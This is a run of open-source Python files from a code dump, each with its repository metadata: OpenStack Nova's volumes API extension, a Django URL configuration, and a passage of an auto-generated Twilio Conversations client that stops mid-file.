"source": "github",
"line_count": 16,
"max_line_length": 59,
"avg_line_length": 24.5625,
"alnum_prop": 0.6412213740458015,
"repo_name": "Dolphman/pynationstates",
"id": "3625325b6d4e462dc7dd2fce13391b1ea3e9b250",
"size": "393",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utility/happeningsparser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "67099"
}
],
"symlink_target": ""
} |
"""The volumes extension."""
from oslo_utils import strutils
from webob import exc
from nova.api.openstack import common
from nova.api.openstack.compute.schemas import volumes as volumes_schema
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api import validation
from nova import compute
from nova import exception
from nova.i18n import _
from nova import objects
from nova import volume
ALIAS = "os-volumes"
authorize = extensions.os_compute_authorizer(ALIAS)
authorize_attach = extensions.os_compute_authorizer('os-volumes-attachments')
def _translate_volume_detail_view(context, vol):
"""Maps keys for volumes details view."""
d = _translate_volume_summary_view(context, vol)
# No additional data / lookups at the moment
return d
def _translate_volume_summary_view(context, vol):
"""Maps keys for volumes summary view."""
d = {}
d['id'] = vol['id']
d['status'] = vol['status']
d['size'] = vol['size']
d['availabilityZone'] = vol['availability_zone']
d['createdAt'] = vol['created_at']
if vol['attach_status'] == 'attached':
d['attachments'] = [_translate_attachment_detail_view(vol['id'],
vol['instance_uuid'],
vol['mountpoint'])]
else:
d['attachments'] = [{}]
d['displayName'] = vol['display_name']
d['displayDescription'] = vol['display_description']
if vol['volume_type_id'] and vol.get('volume_type'):
d['volumeType'] = vol['volume_type']['name']
else:
d['volumeType'] = vol['volume_type_id']
d['snapshotId'] = vol['snapshot_id']
if vol.get('volume_metadata'):
d['metadata'] = vol.get('volume_metadata')
else:
d['metadata'] = {}
return d
class VolumeController(wsgi.Controller):
"""The Volumes API controller for the OpenStack API."""
def __init__(self):
self.volume_api = volume.API()
super(VolumeController, self).__init__()
@extensions.expected_errors(404)
def show(self, req, id):
"""Return data about the given volume."""
context = req.environ['nova.context']
authorize(context)
try:
vol = self.volume_api.get(context, id)
except exception.VolumeNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return {'volume': _translate_volume_detail_view(context, vol)}
@wsgi.response(202)
@extensions.expected_errors(404)
def delete(self, req, id):
"""Delete a volume."""
context = req.environ['nova.context']
authorize(context)
try:
self.volume_api.delete(context, id)
except exception.VolumeNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
@extensions.expected_errors(())
def index(self, req):
"""Returns a summary list of volumes."""
return self._items(req, entity_maker=_translate_volume_summary_view)
@extensions.expected_errors(())
def detail(self, req):
"""Returns a detailed list of volumes."""
return self._items(req, entity_maker=_translate_volume_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of volumes, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
volumes = self.volume_api.get_all(context)
limited_list = common.limited(volumes, req)
res = [entity_maker(context, vol) for vol in limited_list]
return {'volumes': res}
@extensions.expected_errors((400, 404))
@validation.schema(volumes_schema.create)
def create(self, req, body):
"""Creates a new volume."""
context = req.environ['nova.context']
authorize(context)
vol = body['volume']
vol_type = vol.get('volume_type')
metadata = vol.get('metadata')
snapshot_id = vol.get('snapshot_id', None)
if snapshot_id is not None:
try:
snapshot = self.volume_api.get_snapshot(context, snapshot_id)
except exception.SnapshotNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
else:
snapshot = None
size = vol.get('size', None)
if size is None and snapshot is not None:
size = snapshot['volume_size']
availability_zone = vol.get('availability_zone')
try:
new_volume = self.volume_api.create(
context,
size,
vol.get('display_name'),
vol.get('display_description'),
snapshot=snapshot,
volume_type=vol_type,
metadata=metadata,
availability_zone=availability_zone
)
except exception.InvalidInput as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
# TODO(vish): Instance should be None at db layer instead of
# trying to lazy load, but for now we turn it into
# a dict to avoid an error.
retval = _translate_volume_detail_view(context, dict(new_volume))
result = {'volume': retval}
location = '%s/%s' % (req.url, new_volume['id'])
return wsgi.ResponseObject(result, headers=dict(location=location))
def _translate_attachment_detail_view(volume_id, instance_uuid, mountpoint):
"""Maps keys for attachment details view."""
d = _translate_attachment_summary_view(volume_id,
instance_uuid,
mountpoint)
# No additional data / lookups at the moment
return d
def _translate_attachment_summary_view(volume_id, instance_uuid, mountpoint):
"""Maps keys for attachment summary view."""
d = {}
# NOTE(justinsb): We use the volume id as the id of the attachment object
d['id'] = volume_id
d['volumeId'] = volume_id
d['serverId'] = instance_uuid
if mountpoint:
d['device'] = mountpoint
return d
class VolumeAttachmentController(wsgi.Controller):
"""The volume attachment API controller for the OpenStack API.
A child resource of the server. Note that we use the volume id
as the ID of the attachment (though this is not guaranteed externally)
"""
def __init__(self):
self.compute_api = compute.API(skip_policy_check=True)
self.volume_api = volume.API()
super(VolumeAttachmentController, self).__init__()
@extensions.expected_errors(404)
def index(self, req, server_id):
"""Returns the list of volume attachments for a given instance."""
context = req.environ['nova.context']
authorize_attach(context, action='index')
return self._items(req, server_id,
entity_maker=_translate_attachment_summary_view)
@extensions.expected_errors(404)
def show(self, req, server_id, id):
"""Return data about the given volume attachment."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='show')
volume_id = id
instance = common.get_instance(self.compute_api, context, server_id)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
if not bdms:
msg = _("Instance %s is not attached.") % server_id
raise exc.HTTPNotFound(explanation=msg)
assigned_mountpoint = None
for bdm in bdms:
if bdm.volume_id == volume_id:
assigned_mountpoint = bdm.device_name
break
if assigned_mountpoint is None:
msg = _("volume_id not found: %s") % volume_id
raise exc.HTTPNotFound(explanation=msg)
return {'volumeAttachment': _translate_attachment_detail_view(
volume_id,
instance.uuid,
assigned_mountpoint)}
@extensions.expected_errors((400, 404, 409))
@validation.schema(volumes_schema.create_volume_attachment)
def create(self, req, server_id, body):
"""Attach a volume to an instance."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='create')
volume_id = body['volumeAttachment']['volumeId']
device = body['volumeAttachment'].get('device')
instance = common.get_instance(self.compute_api, context, server_id)
try:
device = self.compute_api.attach_volume(context, instance,
volume_id, device)
except exception.VolumeNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'attach_volume', server_id)
except (exception.InvalidVolume,
exception.InvalidDevicePath) as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
# The attach is async
attachment = {}
attachment['id'] = volume_id
attachment['serverId'] = server_id
attachment['volumeId'] = volume_id
attachment['device'] = device
# NOTE(justinsb): And now, we have a problem...
# The attach is async, so there's a window in which we don't see
# the attachment (until the attachment completes). We could also
# get problems with concurrent requests. I think we need an
# attachment state, and to write to the DB here, but that's a bigger
# change.
# For now, we'll probably have to rely on libraries being smart
# TODO(justinsb): How do I return "accepted" here?
return {'volumeAttachment': attachment}
@wsgi.response(202)
@extensions.expected_errors((400, 404, 409))
@validation.schema(volumes_schema.update_volume_attachment)
def update(self, req, server_id, id, body):
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='update')
old_volume_id = id
try:
old_volume = self.volume_api.get(context, old_volume_id)
new_volume_id = body['volumeAttachment']['volumeId']
new_volume = self.volume_api.get(context, new_volume_id)
except exception.VolumeNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
instance = common.get_instance(self.compute_api, context, server_id)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
found = False
try:
for bdm in bdms:
if bdm.volume_id != old_volume_id:
continue
try:
self.compute_api.swap_volume(context, instance, old_volume,
new_volume)
found = True
break
except exception.VolumeUnattached:
# The volume is not attached. Treat it as NotFound
# by falling through.
pass
except exception.InvalidVolume as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'swap_volume', server_id)
if not found:
msg = _("The volume was either invalid or not attached to the "
"instance.")
raise exc.HTTPNotFound(explanation=msg)
@wsgi.response(202)
@extensions.expected_errors((400, 403, 404, 409))
def delete(self, req, server_id, id):
"""Detach a volume from an instance."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='delete')
volume_id = id
instance = common.get_instance(self.compute_api, context, server_id)
try:
volume = self.volume_api.get(context, volume_id)
except exception.VolumeNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
if not bdms:
msg = _("Instance %s is not attached.") % server_id
raise exc.HTTPNotFound(explanation=msg)
found = False
try:
for bdm in bdms:
if bdm.volume_id != volume_id:
continue
if bdm.is_root:
msg = _("Can't detach root device volume")
raise exc.HTTPForbidden(explanation=msg)
try:
self.compute_api.detach_volume(context, instance, volume)
found = True
break
except exception.VolumeUnattached:
# The volume is not attached. Treat it as NotFound
# by falling through.
pass
except exception.InvalidVolume as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'detach_volume', server_id)
if not found:
msg = _("volume_id not found: %s") % volume_id
raise exc.HTTPNotFound(explanation=msg)
def _items(self, req, server_id, entity_maker):
"""Returns a list of attachments, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
instance = common.get_instance(self.compute_api, context, server_id)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
limited_list = common.limited(bdms, req)
results = []
for bdm in limited_list:
if bdm.volume_id:
results.append(entity_maker(bdm.volume_id,
bdm.instance_uuid,
bdm.device_name))
return {'volumeAttachments': results}
def _translate_snapshot_detail_view(context, vol):
"""Maps keys for snapshots details view."""
d = _translate_snapshot_summary_view(context, vol)
# NOTE(gagupta): No additional data / lookups at the moment
return d
def _translate_snapshot_summary_view(context, vol):
"""Maps keys for snapshots summary view."""
d = {}
d['id'] = vol['id']
d['volumeId'] = vol['volume_id']
d['status'] = vol['status']
# NOTE(gagupta): We map volume_size as the snapshot size
d['size'] = vol['volume_size']
d['createdAt'] = vol['created_at']
d['displayName'] = vol['display_name']
d['displayDescription'] = vol['display_description']
return d
class SnapshotController(wsgi.Controller):
"""The Snapshots API controller for the OpenStack API."""
def __init__(self):
self.volume_api = volume.API()
super(SnapshotController, self).__init__()
@extensions.expected_errors(404)
def show(self, req, id):
"""Return data about the given snapshot."""
context = req.environ['nova.context']
authorize(context)
try:
vol = self.volume_api.get_snapshot(context, id)
except exception.SnapshotNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return {'snapshot': _translate_snapshot_detail_view(context, vol)}
@wsgi.response(202)
@extensions.expected_errors(404)
def delete(self, req, id):
"""Delete a snapshot."""
context = req.environ['nova.context']
authorize(context)
try:
self.volume_api.delete_snapshot(context, id)
except exception.SnapshotNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
@extensions.expected_errors(())
def index(self, req):
"""Returns a summary list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_summary_view)
@extensions.expected_errors(())
def detail(self, req):
"""Returns a detailed list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of snapshots, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
snapshots = self.volume_api.get_all_snapshots(context)
limited_list = common.limited(snapshots, req)
res = [entity_maker(context, snapshot) for snapshot in limited_list]
return {'snapshots': res}
@extensions.expected_errors(400)
@validation.schema(volumes_schema.snapshot_create)
def create(self, req, body):
"""Creates a new snapshot."""
context = req.environ['nova.context']
authorize(context)
snapshot = body['snapshot']
volume_id = snapshot['volume_id']
force = snapshot.get('force', False)
force = strutils.bool_from_string(force, strict=True)
if force:
create_func = self.volume_api.create_snapshot_force
else:
create_func = self.volume_api.create_snapshot
new_snapshot = create_func(context, volume_id,
snapshot.get('display_name'),
snapshot.get('display_description'))
retval = _translate_snapshot_detail_view(context, new_snapshot)
return {'snapshot': retval}
class Volumes(extensions.V21APIExtensionBase):
"""Volumes support."""
name = "Volumes"
alias = ALIAS
version = 1
def get_resources(self):
resources = []
res = extensions.ResourceExtension(
ALIAS, VolumeController(), collection_actions={'detail': 'GET'})
resources.append(res)
res = extensions.ResourceExtension('os-volumes_boot',
inherits='servers')
resources.append(res)
res = extensions.ResourceExtension('os-volume_attachments',
VolumeAttachmentController(),
parent=dict(
member_name='server',
collection_name='servers'))
resources.append(res)
res = extensions.ResourceExtension(
'os-snapshots', SnapshotController(),
collection_actions={'detail': 'GET'})
resources.append(res)
return resources
def get_controller_extensions(self):
return []
| {
"content_hash": "418b136ca06af492c01d132fa5109f79",
"timestamp": "",
"source": "github",
"line_count": 551,
"max_line_length": 79,
"avg_line_length": 35.16515426497278,
"alnum_prop": 0.5983175061932288,
"repo_name": "shail2810/nova",
"id": "83137acec6af55b27bab4afdeb31db7a46cc6479",
"size": "20012",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/api/openstack/compute/volumes.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16525734"
},
{
"name": "Shell",
"bytes": "20716"
},
{
"name": "Smarty",
"bytes": "285480"
}
],
"symlink_target": ""
} |
from django.conf.urls.defaults import patterns, url
urlpatterns = patterns('myclient.apps.api.views',
(r'^date_joined/?$', 'date_joined'),
(r'^last_login/?$', 'last_login'),
(r'^email/?$', 'email'),
(r'^remote/date_joined/?$', 'remote', {'target_method': 'date_joined'}),
(r'^remote/last_login/?$', 'remote', {'target_method': 'last_login'}),
(r'^remote/email/?$', 'remote', {'target_method': 'email'}),
)
| {
"content_hash": "400b8cdf636e83891edc14f191c00884",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 79,
"avg_line_length": 48.4,
"alnum_prop": 0.5289256198347108,
"repo_name": "pingali/aadhaar-oauth2-server",
"id": "8399a72b8e1f582e448b687b2374dd15bcd01c89",
"size": "507",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "myclient/apps/api/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "54980"
},
{
"name": "Python",
"bytes": "78518"
}
],
"symlink_target": ""
} |
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
from twilio.rest.conversations.v1.service.conversation.message import MessageList
from twilio.rest.conversations.v1.service.conversation.participant import ParticipantList
from twilio.rest.conversations.v1.service.conversation.webhook import WebhookList
class ConversationList(ListResource):
def __init__(self, version, chat_service_sid):
"""
Initialize the ConversationList
:param Version version: Version that contains the resource
:param chat_service_sid: The unique ID of the Conversation Service this conversation belongs to.
:returns: twilio.rest.conversations.v1.service.conversation.ConversationList
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationList
"""
super(ConversationList, self).__init__(version)
# Path Solution
self._solution = {'chat_service_sid': chat_service_sid, }
self._uri = '/Services/{chat_service_sid}/Conversations'.format(**self._solution)
def create(self, friendly_name=values.unset, unique_name=values.unset,
attributes=values.unset, messaging_service_sid=values.unset,
date_created=values.unset, date_updated=values.unset,
state=values.unset, timers_inactive=values.unset,
timers_closed=values.unset, x_twilio_webhook_enabled=values.unset):
"""
Create the ConversationInstance
:param unicode friendly_name: The human-readable name of this conversation.
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param unicode attributes: An optional string metadata field you can use to store any data you wish.
:param unicode messaging_service_sid: The unique ID of the Messaging Service this conversation belongs to.
:param datetime date_created: The date that this resource was created.
:param datetime date_updated: The date that this resource was last updated.
:param ConversationInstance.State state: Current state of this conversation.
:param unicode timers_inactive: ISO8601 duration when conversation will be switched to `inactive` state.
:param unicode timers_closed: ISO8601 duration when conversation will be switched to `closed` state.
:param ConversationInstance.WebhookEnabledType x_twilio_webhook_enabled: The X-Twilio-Webhook-Enabled HTTP request header
:returns: The created ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
data = values.of({
'FriendlyName': friendly_name,
'UniqueName': unique_name,
'Attributes': attributes,
'MessagingServiceSid': messaging_service_sid,
'DateCreated': serialize.iso8601_datetime(date_created),
'DateUpdated': serialize.iso8601_datetime(date_updated),
'State': state,
'Timers.Inactive': timers_inactive,
'Timers.Closed': timers_closed,
})
headers = values.of({'X-Twilio-Webhook-Enabled': x_twilio_webhook_enabled, })
payload = self._version.create(method='POST', uri=self._uri, data=data, headers=headers, )
return ConversationInstance(
self._version,
payload,
chat_service_sid=self._solution['chat_service_sid'],
)
def stream(self, limit=None, page_size=None):
"""
Streams ConversationInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.conversations.v1.service.conversation.ConversationInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'])
def list(self, limit=None, page_size=None):
"""
Lists ConversationInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.conversations.v1.service.conversation.ConversationInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of ConversationInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationPage
"""
data = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(method='GET', uri=self._uri, params=data, )
return ConversationPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of ConversationInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return ConversationPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a ConversationContext
:param sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.conversations.v1.service.conversation.ConversationContext
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationContext
"""
return ConversationContext(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a ConversationContext
:param sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.conversations.v1.service.conversation.ConversationContext
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationContext
"""
return ConversationContext(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Conversations.V1.ConversationList>'
class ConversationPage(Page):
def __init__(self, version, response, solution):
"""
Initialize the ConversationPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param chat_service_sid: The unique ID of the Conversation Service this conversation belongs to.
:returns: twilio.rest.conversations.v1.service.conversation.ConversationPage
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationPage
"""
super(ConversationPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of ConversationInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.conversations.v1.service.conversation.ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
return ConversationInstance(
self._version,
payload,
chat_service_sid=self._solution['chat_service_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Conversations.V1.ConversationPage>'
class ConversationContext(InstanceContext):
def __init__(self, version, chat_service_sid, sid):
"""
Initialize the ConversationContext
:param Version version: Version that contains the resource
:param chat_service_sid: The SID of the Conversation Service that the resource is associated with.
:param sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.conversations.v1.service.conversation.ConversationContext
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationContext
"""
super(ConversationContext, self).__init__(version)
# Path Solution
self._solution = {'chat_service_sid': chat_service_sid, 'sid': sid, }
self._uri = '/Services/{chat_service_sid}/Conversations/{sid}'.format(**self._solution)
# Dependents
self._participants = None
self._messages = None
self._webhooks = None
def update(self, friendly_name=values.unset, date_created=values.unset,
date_updated=values.unset, attributes=values.unset,
messaging_service_sid=values.unset, state=values.unset,
timers_inactive=values.unset, timers_closed=values.unset,
unique_name=values.unset, x_twilio_webhook_enabled=values.unset):
"""
Update the ConversationInstance
:param unicode friendly_name: The human-readable name of this conversation.
:param datetime date_created: The date that this resource was created.
:param datetime date_updated: The date that this resource was last updated.
:param unicode attributes: An optional string metadata field you can use to store any data you wish.
:param unicode messaging_service_sid: The unique ID of the Messaging Service this conversation belongs to.
:param ConversationInstance.State state: Current state of this conversation.
:param unicode timers_inactive: ISO8601 duration when conversation will be switched to `inactive` state.
:param unicode timers_closed: ISO8601 duration when conversation will be switched to `closed` state.
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param ConversationInstance.WebhookEnabledType x_twilio_webhook_enabled: The X-Twilio-Webhook-Enabled HTTP request header
:returns: The updated ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
data = values.of({
'FriendlyName': friendly_name,
'DateCreated': serialize.iso8601_datetime(date_created),
'DateUpdated': serialize.iso8601_datetime(date_updated),
'Attributes': attributes,
'MessagingServiceSid': messaging_service_sid,
'State': state,
'Timers.Inactive': timers_inactive,
'Timers.Closed': timers_closed,
'UniqueName': unique_name,
})
headers = values.of({'X-Twilio-Webhook-Enabled': x_twilio_webhook_enabled, })
payload = self._version.update(method='POST', uri=self._uri, data=data, headers=headers, )
return ConversationInstance(
self._version,
payload,
chat_service_sid=self._solution['chat_service_sid'],
sid=self._solution['sid'],
)
def delete(self, x_twilio_webhook_enabled=values.unset):
"""
Deletes the ConversationInstance
:param ConversationInstance.WebhookEnabledType x_twilio_webhook_enabled: The X-Twilio-Webhook-Enabled HTTP request header
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
headers = values.of({'X-Twilio-Webhook-Enabled': x_twilio_webhook_enabled, })
return self._version.delete(method='DELETE', uri=self._uri, headers=headers, )
def fetch(self):
"""
Fetch the ConversationInstance
:returns: The fetched ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
payload = self._version.fetch(method='GET', uri=self._uri, )
return ConversationInstance(
self._version,
payload,
chat_service_sid=self._solution['chat_service_sid'],
sid=self._solution['sid'],
)
@property
def participants(self):
"""
Access the participants
:returns: twilio.rest.conversations.v1.service.conversation.participant.ParticipantList
:rtype: twilio.rest.conversations.v1.service.conversation.participant.ParticipantList
"""
if self._participants is None:
self._participants = ParticipantList(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
conversation_sid=self._solution['sid'],
)
return self._participants
@property
def messages(self):
"""
Access the messages
:returns: twilio.rest.conversations.v1.service.conversation.message.MessageList
:rtype: twilio.rest.conversations.v1.service.conversation.message.MessageList
"""
if self._messages is None:
self._messages = MessageList(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
conversation_sid=self._solution['sid'],
)
return self._messages
@property
def webhooks(self):
"""
Access the webhooks
:returns: twilio.rest.conversations.v1.service.conversation.webhook.WebhookList
:rtype: twilio.rest.conversations.v1.service.conversation.webhook.WebhookList
"""
if self._webhooks is None:
self._webhooks = WebhookList(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
conversation_sid=self._solution['sid'],
)
return self._webhooks
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Conversations.V1.ConversationContext {}>'.format(context)
class ConversationInstance(InstanceResource):
class WebhookEnabledType(object):
TRUE = "true"
FALSE = "false"
class State(object):
INACTIVE = "inactive"
ACTIVE = "active"
CLOSED = "closed"
def __init__(self, version, payload, chat_service_sid, sid=None):
"""
Initialize the ConversationInstance
:returns: twilio.rest.conversations.v1.service.conversation.ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
super(ConversationInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'account_sid': payload.get('account_sid'),
'chat_service_sid': payload.get('chat_service_sid'),
'messaging_service_sid': payload.get('messaging_service_sid'),
'sid': payload.get('sid'),
'friendly_name': payload.get('friendly_name'),
'unique_name': payload.get('unique_name'),
'attributes': payload.get('attributes'),
'state': payload.get('state'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'timers': payload.get('timers'),
'url': payload.get('url'),
'links': payload.get('links'),
'bindings': payload.get('bindings'),
}
# Context
self._context = None
self._solution = {'chat_service_sid': chat_service_sid, 'sid': sid or self._properties['sid'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: ConversationContext for this ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationContext
"""
if self._context is None:
self._context = ConversationContext(
self._version,
chat_service_sid=self._solution['chat_service_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def account_sid(self):
"""
:returns: The unique ID of the Account responsible for this conversation.
:rtype: unicode
"""
return self._properties['account_sid']
@property
def chat_service_sid(self):
"""
:returns: The unique ID of the Conversation Service this conversation belongs to.
:rtype: unicode
"""
return self._properties['chat_service_sid']
@property
def messaging_service_sid(self):
"""
:returns: The unique ID of the Messaging Service this conversation belongs to.
:rtype: unicode
"""
return self._properties['messaging_service_sid']
@property
def sid(self):
"""
:returns: A 34 character string that uniquely identifies this resource.
:rtype: unicode
"""
return self._properties['sid']
@property
def friendly_name(self):
"""
:returns: The human-readable name of this conversation.
:rtype: unicode
"""
return self._properties['friendly_name']
@property
def unique_name(self):
"""
:returns: An application-defined string that uniquely identifies the resource
:rtype: unicode
"""
return self._properties['unique_name']
@property
def attributes(self):
"""
:returns: An optional string metadata field you can use to store any data you wish.
:rtype: unicode
"""
return self._properties['attributes']
@property
def state(self):
"""
:returns: Current state of this conversation.
:rtype: ConversationInstance.State
"""
return self._properties['state']
@property
def date_created(self):
"""
:returns: The date that this resource was created.
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The date that this resource was last updated.
:rtype: datetime
"""
return self._properties['date_updated']
@property
def timers(self):
"""
:returns: Timer date values for this conversation.
:rtype: dict
"""
return self._properties['timers']
@property
def url(self):
"""
:returns: An absolute URL for this conversation.
:rtype: unicode
"""
return self._properties['url']
@property
def links(self):
"""
:returns: Absolute URLs to access the participants, messages and webhooks of this conversation.
:rtype: unicode
"""
return self._properties['links']
@property
def bindings(self):
"""
:returns: The bindings
:rtype: dict
"""
return self._properties['bindings']
def update(self, friendly_name=values.unset, date_created=values.unset,
date_updated=values.unset, attributes=values.unset,
messaging_service_sid=values.unset, state=values.unset,
timers_inactive=values.unset, timers_closed=values.unset,
unique_name=values.unset, x_twilio_webhook_enabled=values.unset):
"""
Update the ConversationInstance
:param unicode friendly_name: The human-readable name of this conversation.
:param datetime date_created: The date that this resource was created.
:param datetime date_updated: The date that this resource was last updated.
:param unicode attributes: An optional string metadata field you can use to store any data you wish.
:param unicode messaging_service_sid: The unique ID of the Messaging Service this conversation belongs to.
:param ConversationInstance.State state: Current state of this conversation.
:param unicode timers_inactive: ISO8601 duration when conversation will be switched to `inactive` state.
:param unicode timers_closed: ISO8601 duration when conversation will be switched to `closed` state.
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param ConversationInstance.WebhookEnabledType x_twilio_webhook_enabled: The X-Twilio-Webhook-Enabled HTTP request header
:returns: The updated ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
return self._proxy.update(
friendly_name=friendly_name,
date_created=date_created,
date_updated=date_updated,
attributes=attributes,
messaging_service_sid=messaging_service_sid,
state=state,
timers_inactive=timers_inactive,
timers_closed=timers_closed,
unique_name=unique_name,
x_twilio_webhook_enabled=x_twilio_webhook_enabled,
)
def delete(self, x_twilio_webhook_enabled=values.unset):
"""
Deletes the ConversationInstance
:param ConversationInstance.WebhookEnabledType x_twilio_webhook_enabled: The X-Twilio-Webhook-Enabled HTTP request header
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete(x_twilio_webhook_enabled=x_twilio_webhook_enabled, )
def fetch(self):
"""
Fetch the ConversationInstance
:returns: The fetched ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
return self._proxy.fetch()
@property
def participants(self):
"""
Access the participants
